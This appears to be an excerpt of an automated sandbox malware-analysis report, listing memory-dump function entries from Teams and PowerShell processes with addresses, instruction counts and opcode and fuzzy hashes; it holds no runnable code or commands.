                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ec8830f45e885adc302adb3b45c37fed9195adc210f07d788aa227ae86bf87b
                                                            • Instruction ID: b14a22cb47038e452a37de9c7f59238348cf0bbe3692ad68c4bd68d32ba28fbd
                                                            • Opcode Fuzzy Hash: 3ec8830f45e885adc302adb3b45c37fed9195adc210f07d788aa227ae86bf87b
                                                            • Instruction Fuzzy Hash: E85105A7A8EA716FD32976FDB4515FA6B10EF413F5B0C8177D28D8D0838E0424468BE9

                                                            Executed Functions

                                                            Function 00007FF848F46605 Relevance: .4, Instructions: 434COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2097216050.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848f40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 84d5bf2f98d3997d9e6c509529d1d8e92c8d96c92adf5a41d6a2a382187f1d32
                                                            • Instruction ID: 53b823b32dab53fdae86fd98f3c8dc253dbaf5a553542db72327c761e2d4ba01
                                                            • Opcode Fuzzy Hash: 84d5bf2f98d3997d9e6c509529d1d8e92c8d96c92adf5a41d6a2a382187f1d32
                                                            • Instruction Fuzzy Hash: B2D15531E0EA8A5FF79AAB2858145B57BA0EF26B50F1801FFD40DDB0D3EA1CA805C755
                                                            Function 00007FF848E79EF3 Relevance: .3, Instructions: 257COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2096839355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848e70000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d9c6107d8ecd36d197a52e782170b31f938e0fa7360e1f4ae7717bc5d8592453
                                                            • Instruction ID: eb9bc4cb967ce922ff187122eb2996dd518352be14fc0cb7cd36ddf744be3ccf
                                                            • Opcode Fuzzy Hash: d9c6107d8ecd36d197a52e782170b31f938e0fa7360e1f4ae7717bc5d8592453
                                                            • Instruction Fuzzy Hash: 708129B7D0D9C65FE70ABB2CA8660F53B90FF53768F0C02B6C5984B093FE2914568649
                                                            Function 00007FF848D5E380 Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2096422920.00007FF848D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D5D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848d5d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 529711594400934868d90e94d05b5410551cd6ec33ee46f5762e9c4f42ff20a2
                                                            • Instruction ID: 27e24990267662e0c8ef4c1896d26615f35665313657c91ad911c1333f2ee985
                                                            • Opcode Fuzzy Hash: 529711594400934868d90e94d05b5410551cd6ec33ee46f5762e9c4f42ff20a2
                                                            • Instruction Fuzzy Hash: 1141167180EBC44FE756AB289845A527FF0EF52361F1502EFD088CB1A3D725A84AC792
                                                            Function 00007FF848E79768 Relevance: .1, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2096839355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848e70000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c2e45bdcd8684ca63c7ddecabc53320788610b90adef5b25eee1415b8174e4fc
                                                            • Instruction ID: 5085547f4a2197fa7d496401cb852ee8b199cbb0784c4dbfa1599a41807527eb
                                                            • Opcode Fuzzy Hash: c2e45bdcd8684ca63c7ddecabc53320788610b90adef5b25eee1415b8174e4fc
                                                            • Instruction Fuzzy Hash: 2A31E83191CB489FDB1CEF5CA8066B97BE0FB99710F00422FE44993252DB34A856CBC2
                                                            Function 00007FF848E7A47C Relevance: .1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2096839355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848e70000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cab7eb81d0f873dc642898db7570be76e8d82520c0675e5c0d6e327fac724808
                                                            • Instruction ID: 65eceddc230be925ff77d8fd3a2773e89a22a3f1c99688c9c1e803d997f313e8
                                                            • Opcode Fuzzy Hash: cab7eb81d0f873dc642898db7570be76e8d82520c0675e5c0d6e327fac724808
                                                            • Instruction Fuzzy Hash: D8213A3190CB8C8FEB59DBAC984A7E97FF0EB96320F04416FD048C3152DA75A45ACB91
                                                            Function 00007FF848E733B5 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2096839355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848e70000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                            • Instruction ID: 24ef75c526cb65825109a4e7586d62867e1718cfd4eae63a3c90891dd0916743
                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                            • Instruction Fuzzy Hash: CF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3691DB36E882CB45
                                                            Function 00007FF848F4414D Relevance: .0, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2097216050.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848f40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d17d8053aaff5fbe8338b8d79cdd0c323500432d514a8c409ca4f1fd96344410
                                                            • Instruction ID: f792091696503b3c5837913d903d6ebbde57f14096e40bc4b21711e6120e484a
                                                            • Opcode Fuzzy Hash: d17d8053aaff5fbe8338b8d79cdd0c323500432d514a8c409ca4f1fd96344410
                                                            • Instruction Fuzzy Hash: 63F09031A0D5058FD759EB0CE4004A473E0FFA4364B1100BBE01DD71A3CB25EC508758
                                                            Function 00007FF848F44400 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2097216050.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848f40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 20fe35511f9e42a29a2dbba9e0e186e6189ed6a698095a14ebdf9c5b8cc13377
                                                            • Instruction ID: 14bbc8b06583cdc9af6c6b15f6384f6dcad0b823c3a02df95b097d97b9b6c2f4
                                                            • Opcode Fuzzy Hash: 20fe35511f9e42a29a2dbba9e0e186e6189ed6a698095a14ebdf9c5b8cc13377
                                                            • Instruction Fuzzy Hash: DCF0BE31A0E5448FD754EB0CE4408A8B7F0FF54724B1100F7E109D70A3DB26AC608754
                                                            Function 00007FF848F441D1 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2097216050.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848f40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                            • Instruction ID: d76d88544f8f17bf3ee0e6656c2ee5cd95f71ee8ab9b11c39950933bcc316587
                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                            • Instruction Fuzzy Hash: 94E01A31B0C8088FDA69EB0CE0409A973E1FBB8365B1101B7D14EE75A1CB22EC518B84

                                                            Non-executed Functions

                                                            Function 00007FF848E78BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2096839355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848e70000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M_^4$M_^7$M_^F$M_^J
                                                            • API String ID: 0-622050427
                                                            • Opcode ID: 534fefa1cb2e8f8263d02c6fd69b21d9057d5f113bcb6884de792183f0f1dd20
                                                            • Instruction ID: 725765fdab5eb4fc6dc0b808c9c5322b07e5f4148511d7d2ba618ef3c928e049
                                                            • Opcode Fuzzy Hash: 534fefa1cb2e8f8263d02c6fd69b21d9057d5f113bcb6884de792183f0f1dd20
                                                            • Instruction Fuzzy Hash: 0F2129F7649865AED30A7B7DF8045E93740DF942B4B8953B2E098CB083FE1470868ED4

                                                            Executed Functions

                                                            Function 00007FF848F36605 Relevance: .4, Instructions: 434COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2187843536.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 184020b4454ee1a25696725278d382824e5b0ac6e12dc7e0692392461173a671
                                                            • Instruction ID: 41d552277c4895babdfdb82106bba73970f87c8cfd3bf37e0065189a74cc20f1
                                                            • Opcode Fuzzy Hash: 184020b4454ee1a25696725278d382824e5b0ac6e12dc7e0692392461173a671
                                                            • Instruction Fuzzy Hash: A5C12271E0EB8A5FE79AAB2858145B57BA1EF06390F1801FBD44DCB0D3EE1C9805C355
                                                            Function 00007FF848E69715 Relevance: .2, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2186235577.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ff848e60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02af88250293cf824a647cfea96251936266af587e2be46d90b94fa0643224ee
                                                            • Instruction ID: 5bef7b3eea5a47f02bcffa56dab7f45123a506fb1c1ebbfa71dadcb395ac27d3
                                                            • Opcode Fuzzy Hash: 02af88250293cf824a647cfea96251936266af587e2be46d90b94fa0643224ee
                                                            • Instruction Fuzzy Hash: 1A512431D0CB898FE71AAB1CAC065A87BE0FB66360F04417FD54997193DB3478068B86
                                                            Function 00007FF848D4F360 Relevance: .1, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2185575429.00007FF848D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D4D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ff848d4d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e338bfc0113845bee1c36f6bfb8deef2554d66079b81da3b2079baceeddd17a
                                                            • Instruction ID: 2297590303e7a6a5ff7fb582c931c38108eafeaa7bd54c1c7b1cd205f7565698
                                                            • Opcode Fuzzy Hash: 3e338bfc0113845bee1c36f6bfb8deef2554d66079b81da3b2079baceeddd17a
                                                            • Instruction Fuzzy Hash: B541267180EBC44FE75A9B28A845A523FF0EF56620F1502DFD488CB1A7D725B84AC792
                                                            Function 00007FF848E6A64C Relevance: .1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2186235577.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ff848e60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad249e955f9e80f975803f9021afc9c21aadac104a211cae3701585f77040fc7
                                                            • Instruction ID: 2b5f3035818f3bd070afda3133bf7b2fe60480bf7ac50b76bae0b8e40cbd22a2
                                                            • Opcode Fuzzy Hash: ad249e955f9e80f975803f9021afc9c21aadac104a211cae3701585f77040fc7
                                                            • Instruction Fuzzy Hash: 6421283190CB8C4FDB59DB6C984A7E97FE0EB96321F04416BD048C3152DA74A456CB92
                                                            Function 00007FF848E633B5 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2186235577.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ff848e60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                            • Instruction ID: bc0586010bb7648f8a9788ff2eea40288e3a4c6b570a1a89675a5d11dfb431f3
                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                            • Instruction Fuzzy Hash: CC01A73010CB0D4FDB44EF0CE051AA6B3E0FB85360F10052DE58AC3651DB32E882CB45
                                                            Function 00007FF848F3414D Relevance: .0, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2187843536.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fd214030a326b5b7d92945ad0376cbf8f697e95a31825832fd24522d78b61c4
                                                            • Instruction ID: 57a882c3c36b4ef86db58168bb7f768dc5b33a0debb4b92ef8783dfd518108ae
                                                            • Opcode Fuzzy Hash: 3fd214030a326b5b7d92945ad0376cbf8f697e95a31825832fd24522d78b61c4
                                                            • Instruction Fuzzy Hash: 0EF09A32A0D9058FD75AFB4CE4008A873E0FF64360B1100BBE01DC71A3CB26EC508798
                                                            Function 00007FF848F34400 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2187843536.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a72e4d98230ae3dce10f9ca0054cae8855afe5e91caa70ab6097ee6bf49a79b
                                                            • Instruction ID: 65a0861757c9372eeaee605e7e7156e1c08991d50eafe922db5738b2186dd28c
                                                            • Opcode Fuzzy Hash: 1a72e4d98230ae3dce10f9ca0054cae8855afe5e91caa70ab6097ee6bf49a79b
                                                            • Instruction Fuzzy Hash: 07F0BE31A0D5448FD754EB4CE4408A8B7F0FF54320B1100F7E009C70A3DB26EC608754
                                                            Function 00007FF848F341D1 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2187843536.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                            • Instruction ID: 09613a87b3afa4a6477601c675d6bc6428512a03b2ca1351243ad063737339a8
                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                            • Instruction Fuzzy Hash: 34E01A31B0C8088FDAAAEB4CE0409A973E1FBB8361B1101B7D14EC75A1CB22EC518B84
                                                            Function 00007FF848E6A2C9 Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2186235577.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ff848e60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6644c5429c4d29acd38986cd0375e17aed78acca6194d760ae0c0fcfb0b43dfe
                                                            • Instruction ID: 35364d8323de4e68e0e80f90d7037df15e4a974cf98bf5075cfa3a500eb1d2a8
                                                            • Opcode Fuzzy Hash: 6644c5429c4d29acd38986cd0375e17aed78acca6194d760ae0c0fcfb0b43dfe
                                                            • Instruction Fuzzy Hash: 09E01A35908A4C8FCB58EF2898598EA7BA0FF68301B00429BE80DC7120DB719958CBC2

                                                            Non-executed Functions

                                                            Function 00007FF848E68BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2186235577.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ff848e60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                            • API String ID: 0-2388461625
                                                            • Opcode ID: c2f823834917604030f606e4ac28406e5d14685f992dda4079306600a8d4c0a4
                                                            • Instruction ID: 922e27a44c4728726d6be0ad97921bddf139d38f6e9c7cf8ebecfd16ebed81f9
                                                            • Opcode Fuzzy Hash: c2f823834917604030f606e4ac28406e5d14685f992dda4079306600a8d4c0a4
                                                            • Instruction Fuzzy Hash: 212107F3A899216EC30937BCBC515E86B81EF543B874941F3E218CF113DA24648B8A96

                                                            Executed Functions

                                                            Function 00007FF848E6644D Relevance: .7, Instructions: 740COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2336225874.00007FF848E65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E65000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff848e65000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 397009d3022fa1f0ce509ecf50aab948605150d42b742fb74cd3c4f824c14b86
                                                            • Instruction ID: 00dad1b4c5d61f1ad86eb21c50eebb389f0ae31bf7e0a6e646cd65f6c2c492ea
                                                            • Opcode Fuzzy Hash: 397009d3022fa1f0ce509ecf50aab948605150d42b742fb74cd3c4f824c14b86
                                                            • Instruction Fuzzy Hash: 2EC15F30A1CA4D8FDF89EF58C455AA97BE1FF68340F54416AD409D72A6CB34F881CB81
                                                            Function 00007FF848F36605 Relevance: .4, Instructions: 443COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2336924603.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff848f30000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 68b253134abdddc72da277406a377b5eb3d2d2a4786d2e1b6c5e43b70adbfd37
                                                            • Instruction ID: f4a32936b7ef6532c2baf8c0fb4ee21823769695bc68736d0d9f29f4c6a1c215
                                                            • Opcode Fuzzy Hash: 68b253134abdddc72da277406a377b5eb3d2d2a4786d2e1b6c5e43b70adbfd37
                                                            • Instruction Fuzzy Hash: 61D13131E0EB8A5FE79AAB2858545B57BE0EF0A390F1801FBD44DCB0D3EE18A805C355
                                                            Function 00007FF848E69F85 Relevance: .2, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2336225874.00007FF848E65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E65000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff848e65000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e8632c2778212c323b312c6b11b861e89d36c24db4133f4909422fa070ba7f83
                                                            • Instruction ID: f6d96a3efde6b8929a4e2d117c5cfcedba3843f0b62f36658619d3aa6c60133d
                                                            • Opcode Fuzzy Hash: e8632c2778212c323b312c6b11b861e89d36c24db4133f4909422fa070ba7f83
                                                            • Instruction Fuzzy Hash: C8515BB3D0D9D25FD746BB6CAC620F43B50FF127A9F4C10B7C5988A053EE242466878A
                                                            Function 00007FF848D4EB80 Relevance: .1, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2335356869.00007FF848D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D4D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff848d4d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f048f5c153108b0bfe8712c63370c924840309f391a58ff13cfea3a8b9075d1e
                                                            • Instruction ID: 3423570be3ba7da44941bd50962fabfa695d5505545285f2dc3d9236047f35f4
                                                            • Opcode Fuzzy Hash: f048f5c153108b0bfe8712c63370c924840309f391a58ff13cfea3a8b9075d1e
                                                            • Instruction Fuzzy Hash: 3F41287180EBC45FE7569B389841A523FF0EF52264F1505EFD089CB1A3D729A80EC792
                                                            Function 00007FF848E69768 Relevance: .1, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2336225874.00007FF848E65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E65000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff848e65000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c4b8b80dbb8d2ef3bdea6475c50080379cc96b19e2f59fa5eff88d7a4c57c6fa
                                                            • Instruction ID: cf2ee23ee5c2d7dd65a5ee6dbdea4d98c1fa5ddf8366e15412cbb1a7f475b051
                                                            • Opcode Fuzzy Hash: c4b8b80dbb8d2ef3bdea6475c50080379cc96b19e2f59fa5eff88d7a4c57c6fa
                                                            • Instruction Fuzzy Hash: 4331E93191CA489FDB5CEB5C98066B97BE0FB95710F00412FE44993251DB30B855CBC2
                                                            Function 00007FF848E6A47C Relevance: .1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2336225874.00007FF848E65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E65000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff848e65000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e13bc9d078a50701d6e93f3327ec51d0d8c0b2aacccca2667cd5f6681f219a67
                                                            • Instruction ID: 4dfe6cbf3f7c2ba084fa3c7567dc290e41fcc0d236d2996ac4501e3e99e8e55d
                                                            • Opcode Fuzzy Hash: e13bc9d078a50701d6e93f3327ec51d0d8c0b2aacccca2667cd5f6681f219a67
                                                            • Instruction Fuzzy Hash: 4F21063090CB4C8FDB59DBAC988A6E97BE0EB96320F04426BD049C3152DA74A456CB91
                                                            Function 00007FF848E633B5 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2336225874.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff848e60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                            • Instruction ID: bc0586010bb7648f8a9788ff2eea40288e3a4c6b570a1a89675a5d11dfb431f3
                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                            • Instruction Fuzzy Hash: CC01A73010CB0D4FDB44EF0CE051AA6B3E0FB85360F10052DE58AC3651DB32E882CB45
                                                            Function 00007FF848F34148 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2336924603.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff848f30000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12ff7e19191135c7e224a8212af64da6622b0b5dd37a19bcbb96ec1c38639e81
                                                            • Instruction ID: 9ffaa233902780d0720aceb132727f849769c6ce885b63953a94e6dd070c33c7
                                                            • Opcode Fuzzy Hash: 12ff7e19191135c7e224a8212af64da6622b0b5dd37a19bcbb96ec1c38639e81
                                                            • Instruction Fuzzy Hash: 75F06732A0C9458FE69ABB5CE4009A877E0EF65360B1500BAE06DC71A3CB2AEC518758
                                                            Function 00007FF848F343FB Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2336924603.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff848f30000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7052d47ce38f2355e4eca021f1792f6f0ec4d56f8a1a808b42d402d1632974a8
                                                            • Instruction ID: 4b4186584474b4497eb43500a4f87a3c04b7a85a9d924a26be87ba67610260bd
                                                            • Opcode Fuzzy Hash: 7052d47ce38f2355e4eca021f1792f6f0ec4d56f8a1a808b42d402d1632974a8
                                                            • Instruction Fuzzy Hash: 11F09A31A0C5458FEB94AB58E4409A8B7F0EF65360B1500F6E059C70A3DB2AEC608768
                                                            Function 00007FF848F341D1 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2336924603.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff848f30000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                            • Instruction ID: 09613a87b3afa4a6477601c675d6bc6428512a03b2ca1351243ad063737339a8
                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                            • Instruction Fuzzy Hash: 34E01A31B0C8088FDAAAEB4CE0409A973E1FBB8361B1101B7D14EC75A1CB22EC518B84

